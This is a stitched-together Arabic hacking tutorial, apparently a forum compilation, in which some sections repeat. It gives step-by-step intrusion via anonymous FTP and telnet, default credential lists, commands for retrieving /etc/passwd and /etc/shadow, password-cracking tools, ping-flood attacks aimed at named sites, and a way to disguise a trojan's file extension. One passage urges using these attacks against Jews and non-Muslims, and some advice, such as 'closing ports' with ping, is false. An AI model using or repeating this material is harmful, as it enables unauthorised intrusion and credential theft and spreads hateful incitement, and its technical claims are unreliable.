      وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية،
      وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية،
      حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
      ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
      36-UPWIZUN
      إلغاء تثبيت معالج التحديث وظيفته كالتالي:
      ربما قد استخدمت Windows Update لتثبيت إصدار محدّث من أداة تصحيح،
      أو برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد،
      ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
      للعودة إلى الإصدار السابق.
      37-Asd.exe
      أداة تشغيل عامل برنامج تشغيل التخطي التلقائي
      وظيفته: يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
      التي تسببت في توقف Windows عن الاستجابة في عمليات بدء التشغيل السابقة
      ويضع عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل اللاحقة.
      يذكر ASD كافة الأجهزة أو العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
      أي جهاز تم تعطيله سابقاً بواسطة ASD، وسيحاول Windows استخدام الجهاز
      في محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
      وعند إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً لك ببدء تشغيل الكمبيوتر

      الدوس هو برنامج يأتي مع الويندوز وهو عبارة عن مواجهه خطية يتلقى الأوامر من المستخدم ويقوم بتنفيذها.هذا باختصار
      والهكر عن طريق الدوس(DOS) له تأثير مرعب وقوي جداً وهذه بعض أوامر الدوس حتى نتعرف عليه أكثر:-
      لتشغيل الدوس إذهب إلى إبدأ>تشغيل>وأكتب command أو (start>run
      1-أكتب الأمرmsconfig لمعرفة البرامج اللتي تعمل وقت التشغيل او عند بدء التشغيل ولتتجنب الاختراق يمكنك عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج العامله وقم باطفاء أي برنامج غريب يعمل عند بدء التشغيل.
      2- الأمر Control لفتح لوحة التحكم .
      3- الأمر telnet لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
      4- الأمر ping israel.org/ لمعرفة IP الموقع ويستعمل في الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
      5- الأمر ping -twww.israel.org لارسال رسايل تتسبب في انهيار الموقع عند اجتماع الكثير من المستخدمين على القيام بها ضد موقع معين .
      6- الأمر netstat -n لاظهار IP أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل وسيظهر IP تبعه في موجة الدوس والاي بي تبعك انت ايضا.
      7- الأمر winipcfg لمعرفة IP الخاص بك.
      8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
      9- الأمر regedit ثم اتبع الاتي

      HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو الباتش تقريبا .

      اما بخصوص بينق تدمير المواقع فهي كالتالي:-
      1-ping israel.org/ لمعرفة IP الموقع.
      2-ping -t israel.org/ يحمل الضغط على الموقع المستضيف.
      3-ping -t -a -f israel.org/ يقوم بإعطاء أوامر إلى المستضيف.
      4-ping -w timeout israel.org/ قوم بتوضيح سرعة الموقع الحالية.

      10- كيف تستخدم اوامر الدوس في بعض الهجوم
      con/con.wav
      com1/com1.wav
      com2/com2.wav
      التفاصيل هنا

      طريقة تغيير امتداد exe عن طريق الدوس جديد

      اتبع الخطوات التالية:-
      إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.

      ()()(هجوم الدوز المخيف)()(


      هجوم DOS هو واحد من أخطر أنواع الهجمات الموجودة في الفضاء الافتراضي، وهو يكلف عالم الأعمال ملايين الدولارات كل عام، كما يشكل تهديداً حقيقياً لأي نظام أو شبكة موجودة على طريق المعلومات السريع، تتعلق هذه التكلفة بزمن تعطل النظام، ضياع الموارد، والعمل الفيزيائي اللازم لتحليل والرد على هذا النوع من الهجوم.

      ليس المقصود بـ DOS نظام التشغيل الشهير من مايكروسوفت، إنما المقصود هو هجوم رفض الخدمة Denial of Service Attack ، حيث يقوم المخترق بهذا الهجوم بهدف التخريب والتدمير، وهو لا يحتاج إلى مهارة عالية أو معرفة تقنية عميقة لأن الأدوات الضرورية متاحة ويمكن بسهولة تحميلها من الإنترنت.

      أصابت هجمات DOS العديد من المواقع المهمة والضخة مثل CNN, Yahoo, Bay, ZDNet…. وغيرها، مما أدى إلى توقفها تماماً عن العمل لفترات مختلفة، حدث ذلك في شهر فيبراير من العام 2000.

      يعتمد هذا الهجوم على استغلال نقاط الضعف في بروتوكول (TCP/IP) المصمم للعمل أساساً في بيئة آمنة مفتوحة، مما جعله يحوي العديد من الثغرات التي يمكن أن يستخدمها المخترقين Crackers.

      من المفارقات في هذا الموضوع أن المخترقين المحترفين وحتى المخربين منهم يعتبرون هذا النوع من الهجوم أنه رديئ ويسخرون ممن يقومون به باعتباره أنه اسلوب المبتدئين، ولا يحتاج إلى معرفة وخبرة.
      يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار:
      1-استهلاك عرض الحزمة Baud rate consumption
      حيث يقوم المهاجم باستهلاك كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة من الطلبات مثل: GET, SYN... وغيرها، مما يؤدي إلى استهلاك كامل عرض الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون ذلك إما بالهجوم مباشرة Direct Attack حيث ينتصر في هذه الحالة من لديه عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط العديد من المواقع من أجل إغراق نظام الضحية حيث يقوم المهاجم باستخدام أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه الحالة من عرض حزمة تلك الشبكة.
      من الجدير بالذكر في هذا الصدد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من أنني لم أقم بعد بتحليله كاملاً بعد، إلا أنني أستطيع القول من التحليل المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام المستهدف وهو في هذه الحالة Web server مما يؤدي إلى زيادة الحمل على المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل منها على أنها Process مستقلة تقوم بارسال طلبات GET المذكورة، إن فعالية هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة، إلا أن القوة الحقيقية تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم الهجوم على هدف محدد في وقت معين بدقة، وهذا مايقوم به برنامج الدرة حيث أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة معرفته إلا أنني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه على أهداف الهجوم، ثم يقوم بالهجوم. (شكرا لـ Sp@nder على تزودي بنسخة من برنامج الدرة).

      2-استهلاك الموارد: هذا النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory, Kernel, File system ... وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم استقراره وانهياره في نهاية الأمر.

      3- الثغرات البرمجية أو في مكونات النظام:
      لا يوجد نظام أو برنامج خالي تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه الثغرات مثلا بارسال Packets غير متوفقة مع المعايير القياسية لـ بروتركول TCP/IP المحددة من قبل RFC إلى نظام الضحية مما يؤدي إلى نتائج تختلف حسب نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو فيضان المكدس stack وغير ذلك.
      والأسوأ من هذا استخدام الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة الآلة opcode التالية 0xf00fc7c8 على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً.
      لسوء الحظ لا يمكن الكشف عن هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسبب ما...... ؟؟؟؟؟!!!!!!! الله أعلم

      كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع.


      كنت أنوي أن أتحدث عن طرق الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات لمناقشته، إلا أن المهم بالنسبة للمستخدم المنزلي هو إخفاء رقم IP الخاص به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal ...وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى الشبكات والسيرفرات في موقع فلاشيات ;)


      مايتطسع فعله netstat
      NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
      NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
      NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
      NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
      NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
      NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
      NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة


      درس مهم لتعلم الاختراق بالtelnet
      nor2000.com/telnet.htm

      درس مهم لتعلم الاختراق بالnetbios
      nor2000.com/Logon.htm



      FTP
      أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
      21
      مفتوح و هو البورت الخاص بــ
      FTP
      و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
      Superscanne
      بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
      إضغط على
      Start
      ثم
      Run
      ثم اكتب
      ftp -n
      تطلع لك نافدة في الدوس مكتوب عليها
      FTP&g
      لحد هنا كل شيء تمام
      و بعدين اكتب
      Open
      ثم إضغط على
      إدخال
      Enter
      تتحصل عب النتيجة التالية
      FTP&g
      To
      أكتب جنب
      To
      رقم IP الضحية ثم إضغط على إدخال
      و الحين اهم جزء

      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      Connected to assassin.com/
      220 websrv1 Microsoft FTP Service (Version 4.0).
      و الآن أكتب الكتابة التالية
      ftp&gquote user ftp
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      331 Anonymous acces allowed, send identify (e-mail name) as password.
      و الآن أكتب الكتابة التالية
      ftp&gquote cwd ~root
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      530 Please login with USER and PASS
      ثم أكتب الكتابة التالية
      ftp&gquote pass ftp
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      و نجحت في الإقتحام يعني الاختراق

      230 Anonymous user logged in.
      مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
      ما عليك الآن الا ان تقوم بإستعمال
      اوامر الفتيبي
      و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
      قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

      Pwd
      لكي تعر ما يحتويه الهارد ديسك
      Cd
      لإقتحام مجلد مثال
      Cd black
      في هدا المثال قمت بإقتحام مجلد المسمى بلاك
      Ls
      لكي يتضح لك محتوى المجلد أو الهارد ديسك
      Get
      لكي تحمل الى سطح المكتب بتاع جهازك
      مثال
      Get black.exe
      Put
      العملية الع**ية ل
      Get
      يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
      في جهاز الضحية
      مثال
      Put black.exe
      Clos
      لقطع الإتصال مع الضحية


      هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
      Codes: Signification:
      110 Restart marker reply.
      120 Service ready in nnn minutes. (nnn est un temps)
      125 Data connection already open; transfer starting.
      150 File status oka about to open data connection.
      200 Command okay.
      202 Command not implemented, superfluous at this site.
      211 System status, or system help reply.
      212 Directory status.
      213 File status.
      214 Help message.
      215 NAME system type.
      220 Service ready for new user. 221 Service closing control connection.
      225 Data connection open; no transfer in progress.
      226 Closing data connection.
      227 Entering passive mode (h1, h2, h3, h4, p1, p2).
      230 User logged in, proceed.
      250 Requested file action okay, completed.
      257 "PATHNAME" created.
      331 User name okay, need password.
      332 Need account for login.
      350 Requested file action pendingfurther information.
      421 Service not available, closing control connection.
      425 Can't open data connection.
      426 Connection closed; transfer aborded.
      450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
      451 Requested action aborded: local error processing.
      452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
      500 Syntax error, command unrecognized.
      501 Syntax error in parameters or arguments.
      502 Command not implemented.
      503 Bad sequence of commands.
      504 Command not implemented for that parameter.
      530 Not logged in.
      532 Need account for storing files.
      550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
      551 Requested action aborded: page type unknown.
      552 Requested file action aborded.
      553 Requested action not taken. (Nom de fichier non attribué)


      Telnet
      ما هي التيل نت ؟
      التيل نت هي أداة قديمة في لينوكس(Linux) وينوكس(Unix) وأصبحت الآن موجودة في ويندوز .
      كيف يتم استخدامها سابقا ؟
      كانت تستخدم للتصفح بحيث ان مواقع الانترنت كانت مجرد نصوص بدون صور ... تخيل كم كانت الشبكة كئيبة ...
      كيف يتم استخدامها الآن ؟
      1 ــ قراءة بريدك الالكتروني بالطريقة التالية :
      اذهب إلى متصفحك واكتب telnet://hotmail.com:25/ وسوف يطلب اسم مستخدم وكلمة مرور(طبعا بعد ان يفتح التيل نت) ضع اسم بريدك وكلمة السر الخاصة بك واقرأ بريدك واتخدم الأمر Del msg#1 لحذف الرسالة الأولى وغير الرقم 1 برقم الرسالة المراد حذفها .

      2 ــ اختراق الأجهزة :
      ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف \ إضافة \ إزالة الملفات فيه ...
      تتم أيضا بنفس الطريقة من متصفحك اكتب telnet://ipnumberort/ حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
      21 - 25 - 32(الأساسي) - 99 - 2001
      والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال

      3 ــ اختراق المواقع :
      يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في موقع packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
      المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
      اسم المستخدم : كلمة المرور
      anonymous : anonymous
      guest : guest
      root : root
      sys : sys
      sys : sysadm
      sys : system
      games : games
      ftp : ftp
      mail : mail
      وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكس Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
      young
      test
      لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
      أي الحسابات الغير محمية بكلمة سر .
      اكتب الأمر :
      GET /etc/passwd و GET /etc/group و GET /etc/shadow
      ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
      data = download
      لكي تتمكن من التحكم بالملفات .


      ماهو الملف psswd ?
      الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
      ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد .
      هذا الملف في ثلاث حالات :
      1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
      2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
      3 ــ متروك مثل ما هو ..
      لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
      الباسووردات مشفرة ... سوف تراها كالمثال التالي :
      sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
      هنا سوف نعرف المعلومات التالية:
      1 ــ اسم المستخدم : sirhack .
      2 ــ كلمة السر : 89fGc%^7 .
      3 ــ الاسم الحقيقي : Sir Hackalot .
      4 ــ مجلد الحساب : usr/sirhack/
      5 ــ الغلاف(هنا الكلام في ينوكس او لينوكس) : bin/sh/
      كما رأيتم فكلمة السر مشفرة .

      ما هو الملف group ?
      هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .

      ما هو الملف shadow ?
      في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...

      كيف أفك التشفير ؟
      استخدم أحد برنامجين :
      1 ــ Cracker Jack .
      2 ــ John the ripper .
      وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكس(وينوكس) ...

      نسخة اللينوكس
      openwall.com/john/john-1.6.tar.gz

      نسخة الويندوز
      openwall.com/john/john-16w.zip

      إغلاق المنافذ port الموجودة بالجهاز

      اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ......

      اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .


      اتمنى اتباع الطريقه كما هي :
      إدهب إلى:
      Start&gRun ابداء &l تشغيل

      واكتب الامر التالي
      command.com

      ستظهر لك نافذة إكتب فيها:
      ping host

      و إضغط enter ثم إنتظر و اكتب:
      ping port


      و إضغط enter

      ثم إنتظر و اكتب:
      ping port1027
      وإضغط enter
      و إنتظر ثم إكتب:
      ping port80


      و إضغط enter
      ثم اكتب:
      ping
      و إضغط enter

      ثم اكتب:
      ping port
      و إضغط enter


      و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية.

      لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

      User name-Password

      وهما يكونان محفوظين في ملف يسمي

      PASSWDغالبا

      بعض المواقع تضع هذا الملف في الإف تي بي

      ما هو إف تي بي؟

      FTP=File Transfer Protocol بروتوكول نقل الملفات تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

      ·start==>run إبدأ ثم تشغيل

      واكتب telnet

      سيفتح التلنت اضغط علىRemote System ==> connect

      ثم اكتب الموقع في Host Name مثلا

      kahane.org أو الآيبي الخاص به

      وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

      ثم اضغط connect

      وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

      user anonymous

      ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

      pass zzzoozz@yahoo.com

      اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

      ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

      بعدها سنحصل على ملف الباسوورد

      قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

      cute ftp - ws_ftp

      مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

      ftp.kahane.org

      لتحصل على الملف في التلنت اكتب

      retr /etc/passwd

      /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

      Sunos 5.0 etc/shadow او etc/passwd
      Linux etc/shadow او etc/passwd
      BSD4.3 -RENO etc/master.passwd
      AIX etc/security/passwd
      NT ويندوز scripts/passwd

      وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

      أغلب استخدامات الدوز والمعروفة

      1-command هذا الامر يدخلك الى موجه الدوس .
      2-regedit هذا الامر لمحرر سجل الوندووز ( الشجرة ) .
      3·-icwscrpt هذا الامر خاص بنسخ ملفات الـ dll
      4-scandskw هذا الامر لعمل تفحص للاقراص .
      5-imgstart هذا الأمر لتشغيل قرص ويندووز المضغوط
      6-msiexec حقوق تركيب ويندووز .
      7- : d : c للوصول السريع إلى الدرايفرات
      8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
      9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص
      10-packager وهذا الامر لبرامج يغير الايقونات
      11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ
      12-- sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
      protocol.ini
      system.ini
      win.ini
      config.sys
      autoexec.bat
      13-sfc وهذا الامر لإسترجاع بعض ملفات الـ dll عندما تتلف
      14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا
      15-debug لمعرفة نوع كرت الفيديو او الشاشة
      16-DEFRAG لإلغاء تجزئة القرص
      17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
      18-winipcfg لمعرفة IP
      19-TEMP للوصول الى ملفات الويندوز المؤقتة
      20-- tuneup هذا الامر لتشغيل برنامج معالج الصيانة
      21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
      22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة
      23-ftp هذا الامر لجلب البرامج بسرعه من الدوس .
      24-Tips.txt هذا الأمر يظهر بعض أسرار ويندووز 98
      25-- telnet وهذا الامر يشغل برنامج telnet
      26-progman وهذا الامر يأخذك الى قائمة البرامج.
      27-drwatson أداة لتشخيص أخطاء النظام.
      28-cliconfg.
      29-- mkcompat.
      30-CVT1.EXE
      هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
      31-SCANREG
      مدقق تسجيل ويندوزلتفحص التسجيل
      32-Tune up
      هذا الأمر لتشغيل معالج الصيانة ومن مهامه:
      1/ تسريع البرامج المستخدمة بشكل متكرر
      2/ تدقيق القرص الثابت لاستكشاف الأخطاء
      3/ حذف الملفات الغير ضرورية من الجهاز
      ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.EXE
      34-SYSEDIT
      محرر تكوين النظام لا ينصح بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات التي يريدون عملها على هذا المحرر
      35-VCMUI
      أداة تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها
      شرح مبسط عن هذه الأداة:
      أثناء تثبيت برامج جديدة، بما فيها Windows 98، قد يتم الكشف عن الإصدار القديمة لملفات
      البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ
      على القرص الثابت.
      في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض
      الإصدار لاستعادة ملف النسخة الاحتياطية.
      وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية،
      وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية،
      حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
      ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
      36-UPWIZUN
      إلغاء تثبيت معالج التحديث وظيفته كالتالي:
      ربما قد استخدمت Windows Update لتثبيت إصدار محدّث من أداة تصحيح،
      أو برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد،
      ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
      للعودة إلى الإصدار السابق.
      37-Asd.exe
      أداة تشغيل عامل برنامج تشغيل التخطي التلقائي
      وظيفته: يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
      التي تسببت في توقف Windows عن الاستجابة في عمليات بدء التشغيل السابقة
      ويضع عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل اللاحقة.
      يذكر ASD كافة الأجهزة أو العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
      أي جهاز تم تعطيله سابقاً بواسطة ASD، وسيحاول Windows استخدام الجهاز
      في محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
      وعند إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً لك ببدء تشغيل الكمبيوتر

      الدوس هو برنامج يأتي مع الويندوز وهو عبارة عن مواجهه خطية يتلقى الأوامر من المستخدم ويقوم بتنفيذها.هذا باختصار
      والهكر عن طريق الدوس(DOS) له تأثير مرعب وقوي جداً وهذه بعض أوامر الدوس حتى نتعرف عليه أكثر:-
      لتشغيل الدوس إذهب إلى إبدأ>تشغيل>وأكتب command أو (start>run
      1-أكتب الأمرmsconfig لمعرفة البرامج اللتي تعمل وقت التشغيل او عند بدء التشغيل ولتتجنب الاختراق يمكنك عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج العامله وقم باطفاء أي برنامج غريب يعمل عند بدء التشغيل.
      2- الأمر Control لفتح لوحة التحكم .
      3- الأمر telnet لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
      4- الأمر ping israel.org/ لمعرفة IP الموقع ويستعمل في الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
      5- الأمر ping -twww.israel.org لارسال رسايل تتسبب في انهيار الموقع عند اجتماع الكثير من المستخدمين على القيام بها ضد موقع معين .
      6- الأمر netstat -n لاظهار IP أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل وسيظهر IP تبعه في موجة الدوس والاي بي تبعك انت ايضا.
      7- الأمر winipcfg لمعرفة IP الخاص بك.
      8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
      9- الأمر regedit ثم اتبع الاتي

      HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو الباتش تقريبا .

      اما بخصوص بينق تدمير المواقع فهي كالتالي:-
      1-ping israel.org/ لمعرفة IP الموقع.
      2-ping -t israel.org/ يحمل الضغط على الموقع المستضيف.
      3-ping -t -a -f israel.org/ يقوم بإعطاء أوامر إلى المستضيف.
      4-ping -w timeout israel.org/ قوم بتوضيح سرعة الموقع الحالية.

      10- كيف تستخدم اوامر الدوس في بعض الهجوم
      con/con.wav
      com1/com1.wav
      com2/com2.wav
      التفاصيل هنا

      طريقة تغيير امتداد exe عن طريق الدوس جديد

      اتبع الخطوات التالية:-
      إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.

      ()()(هجوم الدوز المخيف)()(


      هجوم DOS هو واحد من أخطر أنواع الهجمات الموجودة في الفضاء الافتراضي، وهو يكلف عالم الأعمال ملايين الدولارات كل عام، كما يشكل تهديداً حقيقياً لأي نظام أو شبكة موجودة على طريق المعلومات السريع، تتعلق هذه التكلفة بزمن تعطل النظام، ضياع الموارد، والعمل الفيزيائي اللازم لتحليل والرد على هذا النوع من الهجوم.

      ليس المقصود بـ DOS نظام التشغيل الشهير من مايكروسوفت، إنما المقصود هو هجوم رفض الخدمة Denial of Service Attack ، حيث يقوم المخترق بهذا الهجوم بهدف التخريب والتدمير، وهو لا يحتاج إلى مهارة عالية أو معرفة تقنية عميقة لأن الأدوات الضرورية متاحة ويمكن بسهولة تحميلها من الإنترنت.

      أصابت هجمات DOS العديد من المواقع المهمة والضخة مثل CNN, Yahoo, Bay, ZDNet…. وغيرها، مما أدى إلى توقفها تماماً عن العمل لفترات مختلفة، حدث ذلك في شهر فيبراير من العام 2000.

